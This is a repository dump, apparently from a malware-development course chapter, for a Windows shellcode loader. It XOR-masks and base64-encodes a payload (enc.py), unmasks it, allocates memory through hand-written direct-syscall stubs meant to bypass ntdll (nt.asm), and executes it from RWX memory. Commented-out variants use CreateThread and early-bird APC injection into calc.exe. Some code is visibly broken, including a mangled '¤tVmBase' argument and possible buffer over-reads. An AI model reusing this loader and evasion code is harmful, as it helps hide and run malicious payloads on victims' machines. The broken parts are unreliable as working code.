    SYSTEM_INFO sys_inf;
    GetSystemInfo(&sys_inf);
    DWORD page_size{ sys_inf.dwPageSize };
    DWORD alloc_gran{ sys_inf.dwAllocationGranularity };
    SIZE_T szVmResv{ alloc_gran };          // size of one reservation
    SIZE_T szVmCmm{ page_size };            // size of one commit (one page)
    DWORD cVmResv = (rest2_decoded.length() / szVmResv) + 1;   // reservations needed, always >= 1
    DWORD cVmCmm = szVmResv / szVmCmm;      // pages per reservation; only used in the commented-out loop
    // May return nullptr; the result is not checked before use.
    LPVOID vmBaseAddress = GetSuitableBaseAddress(
        hProc,
        szVmCmm,
        szVmResv,
        cVmResv
    );
    LPVOID currentVmBase{ vmBaseAddress };
    NTSTATUS status{ 0 };
    vector<LPVOID> vcVmResv;                // reserved bases; only read by the commented-out loop
    // Reserve cVmResv contiguous regions in hProc (PAGE_NOACCESS, nothing
    // committed) through the BNtAVM stub instead of VirtualAllocEx.
    // NOTE(review): "¤tVmBase" below appears to be "&currentVmBase" mangled
    // in extraction (the "&curren;" entity); BNtAVM takes a PVOID*.
    for (int i = 1; i <= cVmResv; ++i)
    {
        status = BNtAVM(
            hProc,
            ¤tVmBase,
            NULL,
            &szVmResv,
            MEM_RESERVE,
            PAGE_NOACCESS
        );
        if (STATUS_SUCCESS == status) {
            vcVmResv.push_back(currentVmBase);
        }
        else {
            std::cout << "AVM error";       // reported, but the loop carries on
        }
        currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
    }
    DWORD offsetSc{ 0 };    // only used in the commented-out loop
    DWORD oldProt;          // only used in the commented-out loop (C4101 in the build log)
    double prcDone{ 0 };    // never used
    DWORD cmm_i;            // only used in the commented-out loop (C4101 in the build log)
    for (int i = 0; i < cVmResv; ++i)
    {
        // Unmask one page's worth of the blob. sc is never deleted.
        // NOTE(review): S holds rest2_decoded.length() bytes, but the index
        // runs up to szVmCmm * cVmResv - 1, so this may read past the decoded
        // buffer (e.g. when the blob is shorter than one page).
        unsigned char* sc = new unsigned char[szVmCmm];
        for (int j = 0; j < szVmCmm; j++) {
            //cout << szVmCmm * i + j << endl;
            sc[j] = S[szVmCmm * i + j] ^ XOR_KEY;
        }
        // Active execution path: an RWX commit in the current process
        // followed by a direct call into it. The sizes are inconsistent --
        // the allocation asks for cVmResv bytes (a count, not a size) and the
        // memcpy copies rest2_decoded.length() bytes out of the szVmCmm-byte
        // buffer -- and neither the allocation result nor hProc is involved.
        void* exec = VirtualAlloc(0, cVmResv, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, sc, rest2_decoded.length());
        ((void(*)())exec)();
        // Commented-out remote path: commit each page of the i-th
        // reservation in hProc, write the unmasked bytes, then switch it to
        // PAGE_EXECUTE_READ, all through the nt.asm stubs. Each call's
        // status is overwritten by the next one and never checked.
        /*
        for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)
        {
            DWORD offset = (cmm_i * szVmCmm);
            currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
            status = BNtAVM(
                hProc,
                ¤tVmBase,
                NULL,
                &szVmCmm,
                MEM_COMMIT,
                PAGE_READWRITE
            );
            SIZE_T szWritten{ 0 };
            status = BNtWVM(
                hProc,
                currentVmBase,
                &sc[offset],
                szVmCmm,
                &szWritten
            );
            offsetSc += szVmCmm;
            status = BNtPVM(
                hProc,
                ¤tVmBase,
                &szVmCmm,
                PAGE_EXECUTE_READ,
                &oldProt
            );
        }*/
    }
    // Earlier experiments kept as comments: whole-buffer unmask plus byte
    // reversal, execution via CreateThread, and an early-bird APC into a
    // suspended calc.exe. None of them is compiled.
    /*
    for (int i = 0; i < rest2_decoded.length(); i++) {
        sc[i] = S[i] ^ 8;
    }
    for (int i=0; i < rest2_decoded.length(); i++) {
        sc_rev[i] = sc[rest2_decoded.length() - i-1];
    }*/
    /*
    void * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, sc_rev, rest2_decoded.length());
    //unsigned const char* S=
    ((void(*)())exec)();
    */
    /*
    CreateThread
    HANDLE hThread = CreateThread(
        NULL,
        0,
        (LPTHREAD_START_ROUTINE)exec,
        NULL,
        0,
        NULL);
    if (hThread == NULL)
    {
        return 1;
    }
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    */
    /*
    eariler bird APC
    SIZE_T shellSize = szSc;
    STARTUPINFOA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
    HANDLE victimProcess = pi.hProcess;
    HANDLE threadHandle = pi.hThread;
    LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
    WriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);
    QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
    ResumeThread(threadHandle);
    */
}
// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu
// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
================================================
FILE: chapter4-demo2/demo1/demo1.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>demo1</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="base64.cpp" />
<ClCompile Include="demo1.cpp" />
<MASM Include="nt.asm">
<FileType>CppCode</FileType>
</MASM>
</ItemGroup>
<ItemGroup>
<ClInclude Include="base64.h" />
<ClInclude Include="Header.h" />
<ClInclude Include="nt.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
================================================
FILE: chapter4-demo2/demo1/demo1.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Resource Files\Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="demo1.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="base64.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Header.h">
<Filter>Resource Files</Filter>
</ClInclude>
<ClInclude Include="base64.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
<ClInclude Include="nt.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<MASM Include="nt.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>
================================================
FILE: chapter4-demo2/demo1/demo1.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: chapter4-demo2/demo1/nt.asm
================================================
.code
bye :
    ret                     ; unreferenced label; nothing on this page jumps to or calls it
; Direct-syscall stub, declared in nt.h as BNtAVM(ProcessHandle, BaseAddress,
; ZeroBits, RegionSize, AllocationType, Protect).
; Register state when syscall executes: r10 = rcx (the first argument, where
; the kernel expects it), eax = 18h (hard-coded service number), r8 = 0 (the
; third argument is overwritten by the final xor; main() passes NULL there
; anyway). The earlier r8/r10 moves and the sub have no effect on the
; registers the syscall reads. The "1507 +" remark next to the number
; presumably names the Windows build it was taken from; service numbers
; change between builds, so the stub is tied to that build.
BNtAVM proc
    mov r8, r10             ; no lasting effect: r8 is zeroed again below
    mov r10, 01h            ; no lasting effect: r10 is overwritten below
    xor r10, r10            ; no lasting effect
    mov r10, 0Ah            ; no lasting effect
    mov r10, rcx            ; first argument -> r10
    xor eax, eax
    sub r8, r10             ; no lasting effect: r8 is zeroed again below
    add eax, 18h; 1507 +    ; service number
    xor r8, r8              ; ZeroBits := 0
    syscall
    ret
BNtAVM endp
; Direct-syscall stub, declared in nt.h as BNtWVM(hProcess, lpBaseAddress,
; lpBuffer, NumberOfBytesToRead, NumberOfBytesRead).
; Register state when syscall executes: r10 = original rcx, rcx restored to
; its original value, eax = 3Ah (hard-coded service number; see the build
; remark on BNtAVM). The +0Ah/-0Ah pairs cancel out.
BNtWVM proc
    add rcx, 0Ah            ; undone by "sub rcx, 0Ah" below
    xor eax, eax
    mov r10, rcx            ; r10 = original rcx + 0Ah at this point
    add eax, 3Ah; 1507 +    ; service number
    sub r10, 0Ah            ; r10 = original rcx
    sub rcx, 0Ah            ; rcx = original rcx
    syscall
    ret
BNtWVM endp
; Direct-syscall stub, declared in nt.h as BNtPVM(ProcessHandle, BaseAddress,
; NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection).
; Register state when syscall executes: r10 = rcx, eax = 50h (hard-coded
; service number; see the build remark on BNtAVM). The initial add to r10 is
; overwritten, and the -1/+1 pair cancels out.
BNtPVM proc
    add r10, 1Ch            ; no lasting effect: r10 is overwritten below
    xor eax, eax
    mov r10, rcx            ; first argument -> r10
    sub r10, 01h            ; undone by "add r10, 01h" below
    add eax, 50h; 1507 +    ; service number
    add r10, 01h            ; r10 = rcx again
    syscall
    ret
BNtPVM endp
end
================================================
FILE: chapter4-demo2/demo1/nt.h
================================================
#pragma once
#include <Windows.h>
// NTSTATUS success value; the canonical definition lives in the DDK headers,
// which are not included here.
#define STATUS_SUCCESS 0
// Prototypes of the three direct-syscall stubs implemented in nt.asm (MASM,
// 64-bit: they use r8/r10/rcx and the syscall instruction). C linkage keeps
// the symbol names identical to the assembler proc names. The AVM/WVM/PVM
// suffixes and parameter lists suggest the NtAllocateVirtualMemory /
// NtWriteVirtualMemory / NtProtectVirtualMemory family. Each stub loads a
// hard-coded service number, so the build is fixed, and a syscall issued
// from this image instead of from ntdll is a commonly used detection
// heuristic.
EXTERN_C NTSTATUS BNtAVM(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
);
EXTERN_C NTSTATUS BNtWVM(
    HANDLE hProcess,
    PVOID lpBaseAddress,
    PVOID lpBuffer,
    SIZE_T NumberOfBytesToRead,
    PSIZE_T NumberOfBytesRead
);
EXTERN_C NTSTATUS BNtPVM(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    SIZE_T* NumberOfBytesToProtect,
    ULONG NewAccessProtection,
    PULONG OldAccessProtection
);
================================================
FILE: chapter4-demo2/demo1/x64/Debug/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>E:\last\demo1\x64\Debug\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo2/demo1/x64/Debug/demo1.log
================================================
demo1.vcxproj -> E:\last\demo1\x64\Debug\demo1.exe
================================================
FILE: chapter4-demo2/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Debug|x64|E:\last\demo1\|
================================================
FILE: chapter4-demo2/demo1/x64/Release/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>E:\last\demo1\x64\Release\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo2/demo1/x64/Release/demo1.log
================================================
demo1.cpp
E:\last\demo1\demo1\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”
E:\last\demo1\demo1\demo1.cpp(29,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(34,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(39,16): warning C4018: “<”: 有符号/无符号不匹配
E:\last\demo1\demo1\demo1.cpp(139,58): warning C4267: “初始化”: 从“size_t”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(140,16): warning C4244: “初始化”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(145,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(144,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(153,20): warning C4018: “<=”: 有符号/无符号不匹配
E:\last\demo1\demo1\demo1.cpp(180,20): warning C4018: “<”: 有符号/无符号不匹配
E:\last\demo1\demo1\demo1.cpp(179,12): warning C4101: “cmm_i”: 未引用的局部变量
E:\last\demo1\demo1\demo1.cpp(175,18): warning C4101: “oldProt”: 未引用的局部变量
正在生成代码
已完成代码的生成
1 of 225 functions ( 0.4%) were compiled, the rest were copied from previous compilation.
0 functions were new in current compilation
0 functions had inline decision re-evaluated but remain unchanged
demo1.vcxproj -> E:\last\demo1\x64\Release\demo1.exe
================================================
FILE: chapter4-demo2/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Release|x64|E:\last\demo1\|
================================================
FILE: chapter4-demo2/demo1.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.28729.10
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "demo1", "demo1\demo1.vcxproj", "{1876F365-2DEC-42C9-B80E-B631B26FCAD8}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}
EndGlobalSection
EndGlobal
================================================
FILE: chapter4-demo2/enc.py
================================================
import base64
# Read 1.txt, XOR every byte with 8 (the same value as XOR_KEY in Header.h)
# and print the base64 encoding of the masked bytes as a Python bytes literal.
with open("1.txt", "rb") as f:
    raw = f.read()

masked = bytearray(b ^ 8 for b in raw)
# print(masked)
print(base64.b64encode(masked))
================================================
FILE: chapter4-demo3/demo1/Debug/demo1.log
================================================
demo1.vcxproj -> E:\7bits_demo\demo1\demo1\Debug\demo1.exe
================================================
FILE: chapter4-demo3/demo1/Debug/demo1.tlog/demo1.lastbuildstate
================================================
#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0
Debug|Win32|E:\7bits_demo\demo1\demo1\|
================================================
FILE: chapter4-demo3/demo1/Header.h
================================================
#pragma once
// Byte mask applied to the embedded blob by this chapter's demo1.cpp (not in
// this view); enc.py XORs each input byte with the same value (8) before
// base64-encoding it.
const int XOR_KEY{ 8 };
#include <vector>
// Candidate base addresses; in the chapter4-demo2 copy of this project they
// are probed in order by GetSuitableBaseAddress() and the first one with
// enough free consecutive regions is used -- presumably the same here.
// NOTE(review): LPVOID comes from <Windows.h>, which this header does not
// include itself, so it must be included after <Windows.h>.
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
    (void*)0x0000000010000000,
    (void*)0x0000000021000000,
    (void*)0x0000000032000000,
    (void*)0x0000000043000000,
    (void*)0x0000000050000000,
    (void*)0x0000000041000000,
    (void*)0x0000000042000000,
    (void*)0x0000000040000000,
    (void*)0x0000000022000000 };
================================================
FILE: chapter4-demo3/demo1/base64.cpp
================================================
/*
base64.cpp and base64.h
base64 encoding and decoding with C++.
More information at
https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp
Version: 2.rc.08 (release candidate)
Copyright (C) 2004-2017, 2020, 2021 René Nyffenegger
This source code is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this source code must not be misrepresented; you must not
claim that you wrote the original source code. If you use this source code
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original source code.
3. This notice may not be removed or altered from any source distribution.
René Nyffenegger rene.nyffenegger@adp-gmbh.ch
*/
#include "base64.h"
#include <algorithm>
#include <stdexcept>
//
// The two base64 alphabets, indexed by the `url` flag: both share the first
// 62 symbols and differ only in the last two ('+', '/' vs. '-', '_').
//
static const char* base64_chars[2] = {
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
};
//
// Map one alphabet character to its 6-bit value. Both the standard
// ('+', '/') and the URL-safe ('-', '_') forms of the last two symbols
// are accepted. Any other character is rejected with std::runtime_error.
//
static unsigned int pos_of_char(const unsigned char chr) {
    const bool is_upper = chr >= 'A' && chr <= 'Z';
    const bool is_lower = chr >= 'a' && chr <= 'z';
    const bool is_digit = chr >= '0' && chr <= '9';

    if (is_upper) {
        return chr - 'A';
    }
    if (is_lower) {
        // lower-case letters follow the 26 upper-case ones
        return chr - 'a' + 26;
    }
    if (is_digit) {
        // digits follow the 52 letters
        return chr - '0' + 52;
    }

    switch (chr) {
    case '+':
    case '-':
        return 62;
    case '/':
    case '_':
        return 63;
    default:
        //
        // 2020-10-23: Throw std::exception rather than const char*
        //(Pablo Martin-Gomez, https://github.com/Bouska)
        //
        throw std::runtime_error("Input is not valid base64-encoded data.");
    }
}
//
// Insert a '\n' after every `distance` characters of `str`. No newline is
// appended at the end and an empty input yields an empty string.
// (Provided by https://github.com/JomaCorpFX, adapted by the author.)
//
static std::string insert_linebreaks(std::string str, size_t distance) {
    if (str.empty()) {
        return "";
    }
    // Each inserted newline pushes the next insertion point one further.
    for (size_t at = distance; at < str.size(); at += distance + 1) {
        str.insert(at, "\n");
    }
    return str;
}
//
// Encode `s` with the standard alphabet and wrap the result at
// `line_length` characters.
//
template <typename String, unsigned int line_length>
static std::string encode_with_line_breaks(String s) {
    const auto flat = base64_encode(s, false);
    return insert_linebreaks(flat, line_length);
}
//
// PEM flavour: standard alphabet, lines of 64 characters.
//
template <typename String>
static std::string encode_pem(String s) {
    constexpr unsigned int pem_line_length = 64;
    return encode_with_line_breaks<String, pem_line_length>(s);
}
//
// MIME flavour: standard alphabet, lines of 76 characters.
//
template <typename String>
static std::string encode_mime(String s) {
    constexpr unsigned int mime_line_length = 76;
    return encode_with_line_breaks<String, mime_line_length>(s);
}
//
// Hand the bytes of any std::string-like object to the raw-byte encoder.
//
template <typename String>
static std::string encode(String s, bool url) {
    const unsigned char* bytes = reinterpret_cast<const unsigned char*>(s.data());
    return base64_encode(bytes, s.length(), url);
}
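//
// Encode `in_len` raw bytes starting at `bytes_to_encode`.
//
// url == false: standard alphabet ('+', '/') padded with '='.
// url == true : URL-safe alphabet ('-', '_') padded with '.'.
// Returns the encoded text; an empty input yields an empty string. The
// caller must guarantee that `in_len` bytes are readable from the pointer.
//
std::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {

    // Every group of three input bytes (the last possibly partial) becomes
    // four output characters.
    size_t len_encoded = (in_len + 2) / 3 * 4;

    unsigned char trailing_char = url ? '.' : '=';

    //
    // Choose set of base64 characters. They differ
    // for the last two positions, depending on the url
    // parameter.
    // A bool (as is the parameter url) is guaranteed
    // to evaluate to either 0 or 1 in C++ therefore,
    // the correct character set is chosen by subscripting
    // base64_chars with url.
    //
    const char* base64_chars_ = base64_chars[url];

    std::string ret;
    ret.reserve(len_encoded);

    // size_t, not unsigned int: a 32-bit index compared against a size_t
    // length wraps around and never reaches in_len for inputs of 4 GiB or more.
    size_t pos = 0;

    while (pos < in_len) {
        // Character 1: top 6 bits of byte 0.
        ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);

        if (pos + 1 < in_len) {
            // Character 2: low 2 bits of byte 0, top 4 bits of byte 1.
            ret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);

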